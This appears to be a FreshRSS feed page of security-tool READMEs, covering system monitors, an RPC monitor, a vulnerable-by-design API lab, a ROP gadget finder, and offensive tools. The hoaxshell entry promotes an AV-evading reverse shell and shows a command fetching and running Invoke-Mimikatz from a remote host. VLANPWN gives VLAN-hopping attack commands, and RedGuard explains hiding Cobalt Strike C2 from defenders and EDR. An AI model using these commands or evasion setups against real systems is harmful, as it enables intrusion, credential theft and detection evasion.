FreshRSS

🔒
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayYour RSS feeds

System Informer - A Free, Powerful, Multi-Purpose Tool That Helps You Monitor System Resources, Debug Software And Detect Malware

System Informer

A free, powerful, multi-purpose tool that helps you monitor system resources, debug software and detect malware. Brought to you by Winsider Seminars & Solutions, Inc.

Project Website - Project Downloads


System requirements

Windows 7 or higher, 32-bit or 64-bit.

Features

  • A detailed overview of system activity with highlighting.
  • Graphs and statistics allow you quickly to track down resource hogs and runaway processes.
  • Can't edit or delete a file? Discover which processes are using that file.
  • See what programs have active network connections, and close them if necessary.
  • Get real-time information on disk access.
  • View detailed stack traces with kernel-mode, WOW64 and .NET support.
  • Go beyond services.msc: create, edit and control services.
  • Small, portable and no installation required.
  • 100% Free Software (MIT)

Building the project

Requires Visual Studio (2022 or later).

Execute build_release.cmd located in the build directory to compile the project or load the SystemInformer.sln and Plugins.sln solutions if you prefer building the project using Visual Studio.

You can download the free Visual Studio Community Edition to build the System Informer source code.

See the build readme for more information or if you're having trouble building.

Enhancements/Bugs

Please use the GitHub issue tracker for reporting problems or suggesting new features.

Settings

If you are running System Informer from a USB drive, you may want to save System Informer's settings there as well. To do this, create a blank file named "SystemInformer.exe.settings.xml" in the same directory as SystemInformer.exe. You can do this using Windows Explorer:

  1. Make sure "Hide extensions for known file types" is unticked in Tools > Folder options > View.
  2. Right-click in the folder and choose New > Text Document.
  3. Rename the file to SystemInformer.exe.settings.xml (delete the ".txt" extension).

Plugins

Plugins can be configured from Options > Plugins.

If you experience any crashes involving plugins, make sure they are up to date.

Disk and Network information provided by the ExtendedTools plugin is only available when running System Informer with administrative rights.



RPCMon - RPC Monitor Tool Based On Event Tracing For Windows

A GUI tool for scanning RPC communication through Event Tracing for Windows (ETW). The tool was published as part of a research on RPC communication between the host and a Windows container.

Overview

RPCMon can help researchers to get a high level view over an RPC communication between processes. It was built like Procmon for easy usage, and uses James Forshaw .NET library for RPC. RPCMon can show you the RPC functions being called, the process who called them, and other relevant information.
RPCMon uses a hardcoded RPC dictionary for fast RPC information processing which contains information about RPC modules. It also has an option to build an RPC database so it will be updated from your computer in case some details are missing in the hardcoded RPC dictionary.

Usage

Double click the EXE binary and you will get the GUI Windows.
RPCMon needs a DB to be able to get the details on the RPC functions, without a DB you will have missing information.
To load the DB, press on DB -> Load DB... and choose your DB. You can a DB we added to this project: /DB/RPC_UUID_Map_Windows10_1909_18363.1977.rpcdb.json.

Features

  • A detailed overview of RPC functions activity.
  • Build an RPC database to parse RPC modules or use hardcoded database.
  • Filter\highlight rows based on cells.
  • Bold specific rows.

Credit

We want to thank James Forshaw (@tyranid) for creating the open source NtApiDotNet which allowed us to get the RPC functions.

License

Copyright (c) 2022 CyberArk Software Ltd. All rights reserved
This repository is licensed under Apache-2.0 License - see LICENSE for more details.

References:

For more comments, suggestions or questions, you can contact Eviatar Gerzi (@g3rzi) and CyberArk Labs.



Concealed_Code_Execution - Tools And Technical Write-Ups Describing Attacking Techniques That Rely On Concealing Code Execution On Windows


Hunt & Hackett presents a set of tools and technical write-ups describing attacking techniques that rely on concealing code execution on Windows. Here you will find explanations of how these techniques work, receive advice on detection, and get sample source code for testing your detection coverage.


Content

This repository covers two classes of attacking techniques that extensively use internal Windows mechanisms plus provides suggestions and tools for detecting them:

  • Process Tampering - a set of techniques that conceal the code on the scale of an entire process.
  • Code Injection - a collection of tricks that allow executing code as part of other processes without interfering with their functionality.
  • Detection - a compilation of recommendations for defending against various techniques for concealing code execution.

The core values of the project:

  • The systematic approach. This repository includes more than just a collection of tools or links to external resources. Each subject receives a detailed explanation of the underlying concepts; each specific case gets classified into generic categories.
  • Proof-of-concept tooling. The write-ups are accompanied by example projects in C that demonstrate the use of the described facilities in practice.
  • Beginner to professional. You don't need to be a cybersecurity expert to understand the concepts we describe. Yet, even professionals in the corresponding domain should find the content valuable and educational because of the attention to detail and pitfalls.

Implementation

One final distinctive feature of this project is the extensive use of Native API throughout the samples. Here is the motivation for this choice:

  1. Functionality. Some operations required for the most advanced techniques (such as Process Tampering) are not exposed via other APIs.
  2. Control. Being the lowest level of interaction with the operating system, it provides the most control over its behavior. The Win32 API is implemented on top of Native API, so whatever is possible to achieve with the former is also possible with the latter.
  3. Availability. Being exposed by ntdll.dll, Native API is available in all processes, including the system ones.
  4. Consistency. The interfaces exposed by this API are remarkably consistent. After learning the fundamental design choices, it becomes possible to correctly predict the majority of function prototypes just from the API's name.
  5. Resistance to hooking. It is substantially easier to remove or bypass user-mode hooks when using Native API, partially blinding security software. There are no lower-level libraries that might be patched, so unhooking becomes as simple as loading a second instance of ntdll.dll and redirecting the calls there.

Compiling Remarks

The sample code uses the Native API headers provided by the PHNT project. Make sure to clone the repository using the git clone --recurse-submodules command to fetch this dependency. Alternatively, you can use git submodule update --init after cloning the repository.

To build the projects included with the repository, you will need a recent version of Windows SDK. If you use Visual Studio, please refer to the built-in SDK installation. Alternatively, you can also use the standalone build environment of EWDK. To compile all tools at once, use MSBuild AllTools.sln /t:build /p:configuration=Release /p:platform=x64.



dnsReaper - Subdomain Takeover Tool For Attackers, Bug Bounty Hunters And The Blue Team!


DNS Reaper is yet another sub-domain takeover tool, but with an emphasis on accuracy, speed and the number of signatures in our arsenal!

We can scan around 50 subdomains per second, testing each one with over 50 takeover signatures. This means most organisations can scan their entire DNS estate in less than 10 seconds.


You can use DNS Reaper as an attacker or bug hunter!

You can run it by providing a list of domains in a file, or a single domain on the command line. DNS Reaper will then scan the domains with all of its signatures, producing a CSV file.

You can use DNS Reaper as a defender!

You can run it by letting it fetch your DNS records for you! Yes that's right, you can run it with credentials and test all your domain config quickly and easily. DNS Reaper will connect to the DNS provider and fetch all your records, and then test them.

We currently support AWS Route53, Cloudflare, and Azure. Documentation on adding your own provider can be found here

You can use DNS Reaper as a DevSecOps Pro!

Punk Security are a DevSecOps company, and DNS Reaper has its roots in modern security best practice.

You can run DNS Reaper in a pipeline, feeding it a list of domains that you intend to provision, and it will exit Non-Zero if it detects a takeover is possible. You can prevent takeovers before they are even possible!

Usage

To run DNS Reaper, you can use the docker image or run it with python 3.10.

Findings are returned in the output and more detail is provided in a local "results.csv" file. We also support json output as an option.

Run it with docker

docker run punksecurity/dnsreaper --help

Run it with python

pip install -r requirements.txt
python main.py --help

Common commands

  • Scan AWS account:

    docker run punksecurity/dnsreaper aws --aws-access-key-id <key> --aws-access-key-secret <secret>

    For more information, see the documentation for the aws provider

  • Scan all domains from file:

    docker run -v $(pwd):/etc/dnsreaper punksecurity/dnsreaper file --filename /etc/dnsreaper/<filename>

  • Scan single domain

    docker run punksecurity/dnsreaper single --domain <domain>

  • Scan single domain and output to stdout:

    You should either redirect the stderr output or save stdout output with >

    docker run punksecurity/dnsreaper single --domain <domain> --out stdout --out-format=json > output

Full usage

          ____              __   _____                      _ __
/ __ \__ ______ / /__/ ___/___ _______ _______(_) /___ __
/ /_/ / / / / __ \/ //_/\__ \/ _ \/ ___/ / / / ___/ / __/ / / /
/ ____/ /_/ / / / / ,< ___/ / __/ /__/ /_/ / / / / /_/ /_/ /
/_/ \__,_/_/ /_/_/|_|/____/\___/\___/\__,_/_/ /_/\__/\__, /
PRESENTS /____/
DNS Reaper ☠️

Scan all your DNS records for subdomain takeovers!

usage:
.\main.py provider [options]

output:
findings output to screen and (by default) results.csv

help:
.\main.py --help

providers:
> aws - Scan multiple domains by fetching them from AWS Route53
> azure - Scan multiple domains by fetching t hem from Azure DNS services
> bind - Read domains from a dns BIND zone file, or path to multiple
> cloudflare - Scan multiple domains by fetching them from Cloudflare
> file - Read domains from a file, one per line
> single - Scan a single domain by providing a domain on the commandline
> zonetransfer - Scan multiple domains by fetching records via DNS zone transfer

positional arguments:
{aws,azure,bind,cloudflare,file,single,zonetransfer}

options:
-h, --help Show this help message and exit
--out OUT Output file (default: results) - use 'stdout' to stream out
--out-format {csv,json}
--resolver RESOLVER
Provide a custom DNS resolver (or multiple seperated by commas)
--parallelism PARALLELISM
Number of domains to test in parallel - too high and you may see odd DNS results (default: 30)
--disable-probable Do not check for probable conditions
--enable-unlikely Check for more conditions, but with a high false positive rate
--signature SIGNATURE
Only scan with this signature (multiple accepted)
--exclude-signature EXCLUDE_SIGNATURE
Do not scan with this signature (multiple accepted)
--pipeline Exit Non-Zero on detection (used to fail a pipeline)
-v, --verbose -v for verbose, -vv for extra verbose
--nocolour Turns off coloured text

aws:
Scan multiple domains by fetching them from AWS Route53

--aws-access-key-id AWS_ACCESS_KEY_ID
Optional
--aws-access-key-secret AWS_ACCESS_KEY_SECRET
Optional

azure:
Scan multiple domains by fetching them from Azure DNS services

--az-subscription-id AZ_SUBSCRIPTION_ID
Required
--az-tenant-id AZ_TENANT_ID
Required
--az-client-id AZ_CLIENT_ID
Required
--az-client-secret AZ_CLIENT_SECRET
Required

bind:
Read domains from a dns BIND zone file, or path to multiple

--bind-zone-file BIND_ZONE_FILE
Required

cloudflare:
Scan multiple domains by fetching them from Cloudflare

--cloudflare-token CLOUDFLARE_TOKEN
Required

file:
Read domains from a file, one per line

--filename FILENAME Required

single:
Scan a single domain by providing a domain on the commandline

--domain DOMAIN Required

zonetransfer:
Scan multiple domains by fetching records via DNS zone transfer

--zonetransfer-nameserver ZONE TRANSFER_NAMESERVER
Required
--zonetransfer-domain ZONETRANSFER_DOMAIN
Required


crAPI - Completely Ridiculous API


completely ridiculous API (crAPI) will help you to understand the ten most critical API security risks. crAPI is vulnerable by design, but you'll be able to safely run it to educate/train yourself.

crAPI is modern, built on top of a microservices architecture. When time has come to buy your first car, sign up for an account and start your journey. To know more about crAPI, please check crAPI's overview.


QuickStart Guide

Docker

You'll need to have Docker installed and running on your host system.

Using prebuilt images

You can use prebuilt images generated by our CI workflow.

  • To use the latest stable version.

    • Linux Machine
    curl -o docker-compose.yml https://raw.githubusercontent.com/OWASP/crAPI/main/deploy/docker/docker-compose.yml

    docker-compose pull

    docker-compose -f docker-compose.yml --compatibility up -d
    • Windows Machine
    curl.exe -o docker-compose.yml https://raw.githubusercontent.com/OWASP/crAPI/main/deploy/docker/docker-compose.yml

    docker-compose pull

    docker-compose -f docker-compose.yml --compatibility up -d
  • To use the latest development version

    • Linux Machine
    curl -o docker-compose.yml https://raw.githubusercontent.com/OWASP/crAPI/develop/deploy/docker/docker-compose.yml

    VERSION=develop docker-compose pull

    VERSION=develop docker-compose -f docker-compose.yml --compatibility up -d
    • Windows Machine
    Visit http://localhost:8888

    Note: All emails are sent to mailhog service by default and can be checked on http://localhost:8025 You can change the smtp configuration if required however all emails with domain example.com will still go to mailhog.

    Vagrant

    This option allows you to run crAPI within a virtual machine, thus isolated from your system. You'll need to have Vagrant and, for example VirtualBox installed.

    1. Clone crAPI repository
      $ git clone [REPOSITORY-URL]
    2. Start crAPI Virtual Machine
      $ cd deploy/vagrant && vagrant up
    3. Visit http://192.168.33.20

    Note: All emails are sent to mailhog service and can be checked on http://192.168.33.20:8025

    Once you're done playing with crAPI, you can remove it completely from your system running the following command from the repository root directory

    $ cd deploy/vagrant && vagrant destroy

    For more deployment options visit the setup instructions for more details.

    To know more about challenges in crAPI. Visit challenges



Ropr - A Blazing Fast Multithreaded ROP Gadget Finder. Ropper / Ropgadget Alternative


ropr is a blazing fast multithreaded ROP Gadget finder

What is a ROP Gadget?

ROP (Return Oriented Programming) Gadgets are small snippets of a few assembly instructions typically ending in a ret instruction which already exist as executable code within each binary or library. These gadgets may be used for binary exploitation and to subvert vulnerable executables.

When the addresses of many ROP Gadgets are written into a buffer we have formed a ROP Chain. If an attacker can move the stack pointer into this ROP Chain then control can be completely transferred to the attacker.

Most executables contain enough gadgets to write a turing-complete ROP Chain. For those that don't, one can always use dynamic libraries contained in the same address-space such as libc once we know their addresses.

The beauty of using ROP Gadgets is that no new executable code needs to be written anywhere - an attacker may achieve their objective using only the code that already exists in the program.


How do I use a ROP Gadget?

Typically the first requirement to use ROP Gadgets is to have a place to write your ROP Chain - this can be any readable buffer. Simply write the addresses of each gadget you would like to use into this buffer. If the buffer is too small there may not be enough room to write a long ROP Chain into and so an attacker should be careful to craft their ROP Chain to be efficient enough to fit into the space available.

The next requirement is to be able to control the stack - This can take the form of a stack overflow - which allows the ROP Chain to be written directly under the stack pointer, or a "stack pivot" - which is usually a single gadget which moves the stack pointer to the rest of the ROP Chain.

Once the stack pointer is at the start of your ROP Chain, the next ret instruction will trigger the gadgets to be excuted in sequence - each using the next as its return address on its own stack frame.

It is also possible to add function poitners into a ROP Chain - taking care that function arguments be supplied after the next element of the ROP Chain. This is typically combined with a "pop gadget", which pops the arguments off the stack in order to smoothly transition to the next gadget after the function arguments.

How do I install ropr?

  • Requires cargo (the rust build system)

Easy install:

cargo install ropr

the application will install to ~/.cargo/bin

From source:

git clone https://github.com/Ben-Lichtman/ropr
cd ropr
cargo build --release

the resulting binary will be located in target/release/ropr

Alternatively:

git clone https://github.com/Ben-Lichtman/ropr
cd ropr
cargo install --path .

the application will install to ~/.cargo/bin

How do I use ropr?

For example if I was looking for a way to fill rax with a value from another register I may choose to filter by the regex ^mov eax, ...;:
Now I can add some filters to the command line for the highest quality results:
Now I have a good mov gadget candidate at address 0x00052252

Hoaxshell - An Unconventional Windows Reverse Shell, Currently Undetected By Microsoft Defender And Various Other AV Solutions, Solely Based On Http(S) Traffic


hoaxshell is an unconventional Windows reverse shell, currently undetected by Microsoft Defender and possibly other AV solutions as it is solely based on http(s) traffic. The tool is easy to use, it generates it's own PowerShell payload and it supports encryption (ssl).

So far, it has been tested on fully updated Windows 11 Enterprise and Windows 10 Pro boxes (see video and screenshots).


Video Presentation

Screenshots

Find more screenshots here.

Installation

git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt
chmod +x hoaxshell.py

Usage

Basic shell session over http

sudo python3 hoaxshell.py -s <your_ip>

When you run hoaxshell, it will generate its own PowerShell payload for you to copy and inject on the victim. By default, the payload is base64 encoded for convenience. If you need the payload raw, execute the "rawpayload" prompt command or start hoaxshell with the -r argument. After the payload has been executed on the victim, you'll be able to run PowerShell commands against it.

Encrypted shell session (https):

# Generate self-signed certificate:
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365

# Pass the cert.pem and key.pem as arguments:
sudo python3 hoaxshell.py -s <your_ip> -c </path/to/cert.pem> -k <path/to/key.pem>

The generated PowerShell payload will be longer in length because of an additional block of code that disables the ssl certificate validation.

Grab session mode

In case you close your terminal accidentally, have a power outage or something, you can start hoaxshell in grab session mode, it will attempt to re-establish a session, given that the payload is still running on the victim machine.

sudo python3 hoaxshell.py -s <your_ip> -g

Important: Make sure to start hoaxshell with the same settings as the session you are trying to restore (http/https, port, etc).

Limitations

The shell is going to hang if you execute a command that initiates an interactive session. Example:

# this command will execute succesfully and you will have no problem: 
> powershell echo 'This is a test'

# But this one will open an interactive session within the hoaxshell session and is going to cause the shell to hang:
> powershell

# In the same manner, you won't have a problem executing this:
> cmd /c dir /a

# But this will cause your hoaxshell to hang:
> cmd.exe

So, if you for example would like to run mimikatz throught hoaxshell you would need to invoke the commands:

hoaxshell > IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.13:4443/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command '"PRIVILEGE::Debug"'

Long story short, you have to be careful to not run an exe or cmd that starts an interactive session within the hoaxshell powershell context.

Future

I am currently working on some auxiliary-type prompt commands to automate parts of host enumeration.



VLANPWN - VLAN Attacks Toolkit


VLAN attacks toolkit

DoubleTagging.py - This tool is designed to carry out a VLAN Hopping attack. As a result of injection of a frame with two 802.1Q tags, a test ICMP request will also be sent.

DTPHijacking.py - A script for conducting a DTP Switch Spoofing/Hijacking attack. Sends a malicious DTP-Desirable frame, as a result of which the attacker's machine becomes a trunk channel. The impact of this attack is that you can bypass the segmentation of VLAN networks and see all the traffic of VLAN networks.

python3 DoubleTagging.py --help

.s s. .s .s5SSSs. .s s. .s5SSSs. .s s. s. .s s.
SS. SS. SS. SS. SS. SS. SS.
sS S%S sS sS S%S sSs. S%S sS S%S sS S%S S%S sSs. S%S
SS S%S SS SS S%S SS`S. S%S SS S%S SS S%S S%S SS`S. S%S
SS S%S SS SSSs. S%S SS `S.S%S SS .sS::' SS S%S S%S SS `S.S%S
SS S%S SS SS S%S SS `sS%S SS SS S%S S%S SS `sS%S
SS `:; SS SS `:; SS `:; SS SS `:; `:; SS `:;
SS ;,. SS ;,. SS ;,. SS ;,. SS SS ;,. ;,. SS ;,.
`:;;:' `:;;;;;:' :; ;:' :; ;:' `: `:;;:'`::' :; ;:'

VLAN Double Tagging inject tool. Jump into another VLAN!

Author: @necreas1ng, <necreas1ng@protonmail.com>

usage: DoubleTagging.py [-h] --interface INTERFACE --nativevlan NATIVEVLAN --targetvlan TARGETVLAN --victim VICTIM --attacker ATTACKER

options:
-h, --help show this help message and exit
--interface INTERFACE
Specify your network interface
--nativevlan NATIVEVLAN
Specify the Native VLAN ID
--targetvlan TARGETVLAN
Specify the target VLAN ID for attack
--victim VICTIM Specify the target IP
--attacker ATTACKER Specify the attacker IP

Example:

python3 DoubleTagging.py --interface eth0 --nativevlan 1 --targetvlan 20 --victim 10.10.20.24 --attacker 10.10.10.54
python3 DTPHijacking.py --help

.s s. .s .s5SSSs. .s s. .s5SSSs. .s s. s. .s s.
SS. SS. SS. SS. SS. SS. SS.
sS S%S sS sS S%S sSs. S%S sS S%S sS S%S S%S sSs. S%S
SS S%S SS SS S%S SS`S. S%S SS S%S SS S%S S%S SS`S. S%S
SS S%S SS SSSs. S%S SS `S.S%S SS .sS::' SS S%S S%S SS `S.S%S
SS S%S SS SS S%S SS `sS%S SS SS S%S S%S SS `sS%S
SS `:; SS SS `:; SS `:; SS SS `:; `:; SS `:;
SS ;,. SS ;,. SS ;,. SS ;,. SS SS ;,. ;,. SS ;,.
`:;;:' `:;;;;;:' :; ;:' :; ;:' `: `:;;:'`::' :; ;:'

DTP Switch Hijacking tool. Become a trunk!

Author: @necreas1ng, <necreas1ng@protonmail.com>

usage: DTPHijacking.py [-h] --interface INTERFACE

options:
-h, --help show this help message and exit
--interface INTERFACE
Specify your network interface

Example:

python3 DTPHijacking.py --interface eth0


RedGuard - C2 Front Flow Control Tool, Can Avoid Blue Teams, AVs, EDRs Check


0x00 Introduction

Tool introduction

RedGuard is a derivative work of the C2 facility pre-flow control technology. It has a lighter design, efficient flow interaction, and reliable compatibility with go language development. The core problem it solves is also in the face of increasingly complex red and blue attack and defense drills, giving the attack team a better C2 infrastructure concealment scheme, giving the interactive traffic of the C2 facility a flow control function, and intercepting those "malicious" analysis traffic, and better complete the entire attack mission.

RedGuard is a C2 facility pre-flow control tool that can avoid Blue Team, AVS, EDR, Cyberspace Search Engine checks.


Application scenarios

  • During the offensive and defensive drills, the defender analyzes and traces the source of C2 interaction traffic according to the situational awareness platform
  • Identify and prevent malicious analysis of Trojan samples in cloud sandbox environment based on JA3 fingerprint library
  • Block malicious requests to implement replay attacks and achieve the effect of confusing online
  • In the case of specifying the IP of the online server, the request to access the interactive traffic is restricted by means of a whitelist
  • Prevent the scanning and identification of C2 facilities by cyberspace mapping technology, and redirect or intercept the traffic of scanning probes
  • Supports pre-flow control for multiple C2 servers, and can achieve the effect of domain front-end, load balancing online, and achieve the effect of concealment
  • Able to perform regional host online restriction according to the attribution of IP address by requesting IP reverse lookup API interface
  • Resolve strong features of staged checksum8 rule path parsing without changing the source code.
  • Analyze blue team tracing behavior through interception logs of target requests, which can be used to track peer connection events/issues
  • It has the function of customizing the time period for the legal interaction of the sample to realize the function of only conducting traffic interaction during the working time period
  • Malleable C2 Profile parser capable of validating inbound HTTP/S requests strictly against malleable profile and dropping outgoing packets in case of violation (supports Malleable Profiles 4.0+)
  • Built-in blacklist of IPV4 addresses for a large number of devices, honeypots, and cloud sandboxes associated with security vendors to automatically intercept redirection request traffic
  • SSL certificate information and redirect URLs that can interact with samples through custom tools to circumvent the fixed characteristics of tool traffic
  • ..........

0x01 Install

You can directly download and use the compiled version, or you can download the go package remotely for independent compilation and execution.

git clone https://github.com/wikiZ/RedGuard.git
cd RedGuard
# You can also use upx to compress the compiled file size
go build -ldflags "-s -w" -trimpath
# Give the tool executable permission and perform initialization operations
chmod +x ./RedGuard&&./RedGuard

0x02 Configuration Description

initialization

As shown in the figure below, first grant executable permissions to RedGuard and perform initialization operations. The first run will generate a configuration file in the current user directory to achieve flexible function configuration. Configuration file name: .RedGuard_CobaltStrike.ini.


Configuration file content:


The configuration options of cert are mainly for the configuration information of the HTTPS traffic exchange certificate between the sample and the C2 front-end facility. The proxy is mainly used to configure the control options in the reverse proxy traffic. The specific use will be explained in detail below.

The SSL certificate used in the traffic interaction will be generated in the cert-rsa/ directory under the directory where RedGuard is executed. You can start and stop the basic functions of the tool by modifying the configuration file (the serial number of the certificate is generated according to the timestamp , don't worry about being associated with this feature).If you want to use your own certificate,Just rename them to ca.crt and ca.key.

openssl x509 -in ca.crt -noout -text


Random TLS JARM fingerprints are updated each time RedGuard is started to prevent this from being used to authenticate C2 facilities.


In the case of using your own certificate, modify the HasCert parameter in the configuration file to true to prevent normal communication problems caused by the incompatibility of the CipherSuites encryption suite with the custom certificate caused by the randomization of JARM confusion.

# Whether to use the certificate you have applied for true/false
HasCert = false

RedGuard Usage

root@VM-4-13-ubuntu:~# ./RedGuard -h

Usage of ./RedGuard:
-DropAction string
RedGuard interception action (default "redirect")
-EdgeHost string
Set Edge Host Communication Domain (default "*")
-EdgeTarget string
Set Edge Host Proxy Target (default "*")
-HasCert string
Whether to use the certificate you have applied for (default "true")
-allowIP string
Proxy Requests Allow IP (default "*")
-allowLocation string
Proxy Requests Allow Location (default "*")
-allowTime string
Proxy Requests Allow Time (default "*")
-common string
Cert CommonName (default "*.aliyun.com")
-config string
Set Config Path
-country string
Cert Country (default "CN")
-dns string
Cert DNSName
-host string
Set Proxy HostTarget
-http string
Set Proxy HTTP Port ( default ":80")
-https string
Set Proxy HTTPS Port (default ":443")
-ip string
IPLookUP IP
-locality string
Cert Locality (default "HangZhou")
-location string
IPLookUP Location (default "风起")
-malleable string
Set Proxy Requests Filter Malleable File (default "*")
-organization string
Cert Organization (default "Alibaba (China) Technology Co., Ltd.")
-redirect string
Proxy redirect URL (default "https://360.net")
-type string
C2 Server Type (default "CobaltStrike")
-u Enable configuration file modification

**P.S. You can use the parameter command to modify the configuration file. Of course, I think it may be more convenient to modify it manually with vim. **

0x03 Tool usage

basic interception

If you directly access the port of the reverse proxy, the interception rule will be triggered. Here you can see the root directory of the client request through the output log, but because the request process does not carry the requested credentials, that is, the correct HOST request header So the basic interception rule is triggered, and the traffic is redirected to https://360.net

Here, in order to facilitate the display of the output effect, the actual use can be run in the background through nohup ./RedGuard &.


{"360.net":"http://127.0.0.1:8080","360.com":"https://127.0.0.1:4433"}

It is not difficult to see from the above slice that 360.net corresponds to the proxy to the local port 8080, 360.com points to the local port 4433, and corresponds to the difference in the HTTP protocol used. In the subsequent online, you need to pay attention to the protocol of the listener. The type needs to be consistent with the one set here, and set the corresponding HOST request header.


As shown in the figure above, in the case of unauthorized access, the response information we get is also the return information of the redirected site.

interception method

In the above basic interception case, the default interception method is used, that is, the illegal traffic is intercepted by redirection. By modifying the configuration file, we can change the interception method and the redirected site URL. In fact, this The other way is a redirect, which might be more aptly described as hijacking, cloning, since the response status code returned is 200, and the response is taken from another website to mimic the cloned/hijacked website as closely as possible.

Invalid packets can be misrouted according to three strategies:

  • reset: Terminate the TCP connection immediately.
  • proxy: Get a response from another website to mimic the cloned/hijacked website as closely as possible.
  • redirect: redirect to the specified website and return HTTP status code 302, there is no requirement for the redirected website.
# RedGuard interception action: redirect / rest / proxy (Hijack HTTP Response)
drop_action = proxy
# URL to redirect to
Redirect = https://360.net

Redirect = URL in the configuration file points to the hijacked URL address. RedGuard supports "hot change", which means that while the tool is running in the background through nohup, we can still modify the configuration file. The content is started and stopped in real time.

./RedGuard -u --drop true

Note that when modifying the configuration file through the command line. The -u option should not be too small, otherwise the configuration file cannot be modified successfully. If you need to restore the default configuration file settings, you only need to enter ./RedGuard -u.

Another interception method is DROP, which directly closes the HTTP communication response and is enabled by setting DROP = true. The specific interception effect is as follows:


It can be seen that the C2 pre-flow control directly responds to illegal requests without the HTTP response code. In the detection of cyberspace mapping, the DROP method can achieve the function of hiding the opening of ports. The specific effect can be seen in the following case. analyze.

Proxy port modification

In fact, it is easy to understand here. The configuration of the following two parameters in the configuration file realizes the effect of changing the reverse proxy port. It is recommended to use the default port on the premise of not conflicting with the current server port. If it must be modified, then pay attention to the : of the parameter value not to be missing

# HTTPS Reverse proxy port
Port_HTTPS = :443
# HTTP Reverse proxy port
Port_HTTP = :80

RedGuard logs

The blue team tracing behavior is analyzed through the interception log of the target request, which can be used to track peer connection events/problems. The log file is generated in the directory where RedGuard is running, file name: RedGuard.log.

 

RedGuard Obtain the real IP address

This section describes how to configure RG to obtain the real IP address of a request. You only need to add the following configuration to the profile of the C2 device, that is, to obtain the real IP address of the target through the request header X-Forwarded-For.

http-config {
set trust_x_forwarded_for "true";
}

Request geographic restrictions

The configuration method takes AllowLocation = Jinan, Beijing as an example. It is worth noting here that RedGuard provides two APIs for IP attribution anti-check, one for domestic users and the other for overseas users. Dynamically assign which API to use. If the target is in China, enter Chinese for the set region. Otherwise, enter English place names. It is recommended that domestic users use Chinese names. In this way, the accuracy of the attribution found and the response speed of the API are both is the best choice.

P.S. Domestic users, do not use AllowLocation = Jinan,beijing this way! It doesn't make much sense, the first character of the parameter value determines which API to use!

# IP address owning restrictions example:AllowLocation = 山东,上海,杭州 or shanghai,beijing
AllowLocation = *

 

Before deciding to restrict the region, you can manually query the IP address by the following command.

./RedGuard --ip 111.14.218.206
./RedGuard --ip 111.14.218.206 --location shandong # Use overseas API to query

Here we set to allow only the Shandong region to go online

 

Legit traffic:

 

Illegal request area:

 

Regarding the launch of geographical restrictions, it may be more practical in the current offensive and defensive drills. Basically, the targets of provincial and municipal protection network restrictions are in designated areas, and the traffic requested by other areas can naturally be ignored, and the function of RedGuard is Not only can a single region be restricted, but multiple online regions can be restricted based on provinces and cities, and traffic requested by other regions can be intercepted.

Blocking based on whitelist

In addition to the built-in blacklist of security vendor IPs in RedGuard, we can also restrict according to the whitelist. In fact, I also suggest that when doing web management, we can restrict the addresses of the online IPs according to the whitelist, so as to divide multiple IPs way of address.

# Whitelist list example: AllowIP = 172.16.1.1,192.168.1.1
AllowIP = 127.0.0.1

 

As shown in the figure above, we only allow 127.0.0.1 to go online, then the request traffic of other IPs will be intercepted.

Block based on time period

This function is more interesting. Setting the following parameter values in the configuration file means that the traffic control facility can only go online from 8:00 am to 9:00 pm. The specific application scenario here is that during the specified attack time, we allow communication with C2 Traffic interacts, and remains silent at other times. This also allows the red teams to get a good night's sleep without worrying about some blue team on the night shift being bored to analyze your Trojan and then wake up to something indescribable, hahaha.

# Limit the time of requests example: AllowTime = 8:00 - 16:00
AllowTime = 8:00 - 21:00


Malleable Profile

RedGuard uses the Malleable C2 profile. It then parses the provided malleable configuration file section to understand the contract and pass only those inbound requests that satisfy it, while misleading others. Parts such as http-stager, http-get and http-post and their corresponding uris, headers, User-Agent etc. are used to distinguish legitimate beacon requests from irrelevant Internet noise or IR/AV/EDR Out-of-bounds packet.

# C2 Malleable File Path
MalleableFile = /root/cobaltstrike/Malleable.profile


The profile written by 风起 is recommended to use:

https://github.com/wikiZ/CobaltStrike-Malleable-Profile

0x04 Case Study

Cyberspace Search Engine

As shown in the figure below, when our interception rule is set to DROP, the spatial mapping system probe will probe the / directory of our reverse proxy port several times. In theory, the request packet sent by mapping is faked as normal traffic. Show. But after several attempts, because the characteristics of the request packet do not meet the release requirements of RedGuard, they are all responded by Close HTTP. The final effect displayed on the surveying and mapping platform is that the reverse proxy port is not open.

 

The traffic shown in the figure below means that when the interception rule is set to Redirect, we will find that when the mapping probe receives a response, it will continue to scan our directory. UserAgent is random, which seems to be in line with normal traffic requests, but both successfully blocked.


Mapping Platform - Hijack Response Intercept Mode Effect:


Surveying and mapping platform - effect of redirection interception:


Domain fronting

RedGuard supports Domain fronting. In my opinion, there are two forms of presentation. One is to use the traditional Domain fronting method, which can be achieved by setting the port of our reverse proxy in the site-wide acceleration back-to-source address. On the original basis, the function of traffic control is added to the domain fronting, and it can be redirected to the specified URL according to the setting we set to make it look more real. It should be noted that the RedGuard setting of the HTTPS HOST header must be consistent with the domain name of the site-wide acceleration.


In individual combat, I suggest that the above method can be used, and in team tasks, it can also be achieved by self-built "Domain fronting".

 

In the self-built Domain fronting, keep multiple reverse proxy ports consistent, and the HOST header consistently points to the real C2 server listening port of the backend. In this way, our real C2 server can be well hidden, and the server of the reverse proxy can only open the proxy port by configuring the firewall.


This can be achieved through multiple node servers, and configure multiple IPs of our nodes in the CS listener HTTPS online IP.

Edge Node

RedGuard 22.08.03 updated the edge host online settings - custom intranet host interaction domain name, and the edge host uses the domain front CDN node interaction. The asymmetry of the information exchanged between the two hosts is achieved, making it more difficult to trace the source and make it difficult to check.


CobaltStrike

If there is a problem with the above method, the actual online C2 server cannot be directly intercepted by the firewall, because the actual load balancing request in the reverse proxy is made by the IP of the cloud server manufacturer.

If it is a single soldier, we can set an interception strategy on the cloud server firewall.


Then set the address pointed to by the proxy to https://127.0.0.1:4433.

{"360.net":"http://127.0.0.1:8080","360.com":"https://127.0.0.1:4433"}

And because our basic verification is based on the HTTP HOST request header, what we see in the HTTP traffic is also the same as the domain fronting method, but the cost is lower, and only one cloud server is needed.

 

For the listener settings, the online port is set to the RedGuard reverse proxy port, and the listening port is the actual online port of the local machine.

Metasploit

Generates Trojan

